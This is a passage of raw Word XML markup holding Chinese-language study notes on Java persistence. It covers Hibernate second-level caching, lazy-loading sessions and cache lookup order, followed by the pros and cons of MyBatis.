      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">1) </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">经常被修改的数据　　</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">2) </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">绝对不允许出现并发访问的数据，如财务数据，绝对不允许出现并发　　</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">3) </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>与其他应用共享的数据。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0098478E" w:rsidRPr="00F41A4C" w:rsidRDefault="0098478E" w:rsidP="0098478E">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="28557E"/>
        <w:spacing w:before="150" w:after="150" w:line="293"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 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0098478E" w:rsidRPr="00F41A4C" w:rsidRDefault="0098478E" w:rsidP="0098478E">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="28557E"/>
        <w:spacing w:before="150" w:after="150" w:line="293"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3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的延迟加载实现要解决两个问题：正常关闭连接和确保请求中访问的是同一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0098478E" w:rsidRPr="00F41A4C" w:rsidRDefault="0098478E" w:rsidP="0098478E">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="28557E"/>
        <w:spacing w:before="150" w:after="150" w:line="293"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Hibernate session</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>就是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>java.sql.Connection</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>的一层高级封装，一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>对应了一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Connection</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0098478E" w:rsidRPr="00F41A4C" w:rsidRDefault="0098478E" w:rsidP="0098478E">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="28557E"/>
        <w:spacing w:before="150" w:after="150" w:line="293"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http</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>请求结束后正确的关闭</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>（过滤器实现了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>的正常关闭）；延迟加载必须保证是同一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>绑定在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ThreadLocal</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0098478E" w:rsidRPr="00F41A4C" w:rsidRDefault="0098478E" w:rsidP="0098478E">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="28557E"/>
        <w:spacing w:before="150" w:after="150" w:line="293"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 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0098478E" w:rsidRPr="00F41A4C" w:rsidRDefault="0098478E" w:rsidP="0098478E">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="28557E"/>
        <w:spacing w:before="150" w:after="150" w:line="293"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4.Hibernate</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>查找对象如何应用缓存？</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>当</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Hibernate</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>根据</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>访问数据对象的时候，首先从</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>一级缓存中查；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0098478E" w:rsidRPr="00F41A4C" w:rsidRDefault="0098478E" w:rsidP="0098478E">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="28557E"/>
        <w:spacing w:before="150" w:after="150" w:line="293"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查不到，如果配置了二级缓存，那么从二级缓存中查；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0098478E" w:rsidRPr="00F41A4C" w:rsidRDefault="0098478E" w:rsidP="0098478E">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="28557E"/>
        <w:spacing w:before="150" w:after="150" w:line="293"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如果都查不到，再查询数据库，把结果按照</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>放入到缓存删除、更新、增加数据的时候，同时更新缓存。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0098478E" w:rsidRPr="00F41A4C" w:rsidRDefault="0098478E" w:rsidP="004F0660">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003D0803" w:rsidRPr="00F41A4C" w:rsidRDefault="00743AD8" w:rsidP="00743AD8">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>6.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="004F778D" w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00525D7D" w:rsidRPr="00F41A4C">
        <w:t>mybatis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">.1  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>优点与缺点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00456AEC" w:rsidRPr="00F41A4C" w:rsidRDefault="00525D7D" w:rsidP="00D961D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>半自动化</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ORM</w:t>
      </w:r>
      <w:r w:rsidR="00334FB0" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>框架</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00134D2D" w:rsidRPr="00F41A4C" w:rsidRDefault="00134D2D" w:rsidP="00134D2D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>优点：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D0803" w:rsidRPr="00F41A4C" w:rsidRDefault="00334FB0" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>易于学习</w:t>
      </w:r>
      <w:r w:rsidR="004D54AF" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>和掌握</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00334FB0" w:rsidRPr="00F41A4C" w:rsidRDefault="00BD624B" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Sql</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>写在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>文件，程序与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>解耦</w:t>
      </w:r>
      <w:r w:rsidR="00A2555B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00A2555B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>注解方式</w:t>
      </w:r>
      <w:r w:rsidR="00A2555B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00334FB0" w:rsidRPr="00F41A4C" w:rsidRDefault="00A2555B" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>方便</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>优化</w:t>
      </w:r>
      <w:r w:rsidR="00B70C81" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，动态</w:t>
      </w:r>
      <w:r w:rsidR="00B70C81" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="00F553E1" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>编写</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E1B10" w:rsidRPr="00F41A4C" w:rsidRDefault="002E1B10" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>提供映射标签，支持数据库字段对象属性的映射</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C56D05" w:rsidRPr="00F41A4C" w:rsidRDefault="00134D2D" w:rsidP="00C56D05">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>缺点：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C56D05" w:rsidRPr="00F41A4C" w:rsidRDefault="00C35E8F" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>表多，字段多时，工作量大</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C35E8F" w:rsidRPr="00F41A4C" w:rsidRDefault="0025511A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>不支持级联操作</w:t>
      </w:r>
